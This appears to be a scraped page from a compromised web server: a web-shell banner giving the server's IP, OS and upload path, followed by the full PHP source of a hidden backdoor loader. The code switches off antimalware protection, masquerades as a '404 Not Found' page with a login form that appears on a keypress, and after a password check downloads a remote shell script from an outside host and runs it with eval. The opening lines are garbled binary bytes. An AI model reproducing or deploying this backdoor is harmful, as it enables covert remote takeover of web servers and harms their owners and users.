%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
| Server IP : 122.154.253.140 / Your IP : 216.73.216.34 Web Server : Microsoft-IIS/7.5 System : Windows NT SERVER02 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586 User : IUSR ( 0) PHP Version : 5.6.31 Disable Function : NONE MySQL : ON | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/inetpub/wwwroot/building/upload_images/server/php/ |
Upload File : |
<?php
session_start();
error_reporting(0);
define('SECURE_ACCESS', true);
header('X-Powered-By: none');
header('Content-Type: text/html; charset=UTF-8');
ini_set('lsapi_backend_off', '1');
ini_set("imunify360.cleanup_on_restore", false);
ini_set("imunify360.enabled", false);
ini_set("imunify360.antimalware", false);
ini_set("imunify360.realtime_protection", false);
function geturlsinfo($url) {
if (function_exists('curl_exec')) {
$conn = curl_init($url);
curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($conn, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0);
if (isset($_SESSION['SAP'])) {
curl_setopt($conn, CURLOPT_COOKIE, $_SESSION['SAP']);
}
$url_get_contents_data = curl_exec($conn);
curl_close($conn);
} elseif (function_exists('file_get_contents')) {
$url_get_contents_data = file_get_contents($url);
} elseif (function_exists('fopen') && function_exists('stream_get_contents')) {
$handle = fopen($url, "r");
$url_get_contents_data = stream_get_contents($handle);
fclose($handle);
} else {
$url_get_contents_data = false;
}
return $url_get_contents_data;
}
function is_logged_in() {
return isset($_SESSION['logged_in']) && $_SESSION['logged_in'] === true;
}
if (isset($_POST['password'])) {
$entered_password = $_POST['password'];
$hashed_password = '$2y$10$v0jxzrY9n0DvObxTUWlgcOTQViLZ2nj0rD6jaGD2XlHvpaujRxTVe';
if (password_verify($entered_password, $hashed_password)) {
$_SESSION['logged_in'] = true;
$_SESSION['SAP'] = 'biadap';
header("Location: " . $_SERVER['PHP_SELF']);
exit;
} else {
echo "Incorrect password. Please try again.";
}
}
if (is_logged_in()) {
$a = geturlsinfo('https://shell.prinsh.com/Nathan/alfa.txt');
eval('?>' . $a);
} else {
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>404 Not Found</title>
</head>
<body>
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.21.3</center>
<!-- Hidden form login with only input box -->
<form class="hidden-form" action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST" id="loginForm">
<input type="password" name="password" id="password" placeholder="" required>
</form>
<script>
// Form initially hidden
document.querySelector('.hidden-form').style.display = 'none';
document.addEventListener('keydown', function(event) {
if (event.key === 'End') {
// When Home key is pressed, show the form
document.querySelector('.hidden-form').style.display = 'block';
}
});
</script>
</body>
</html>
<?php
}
?>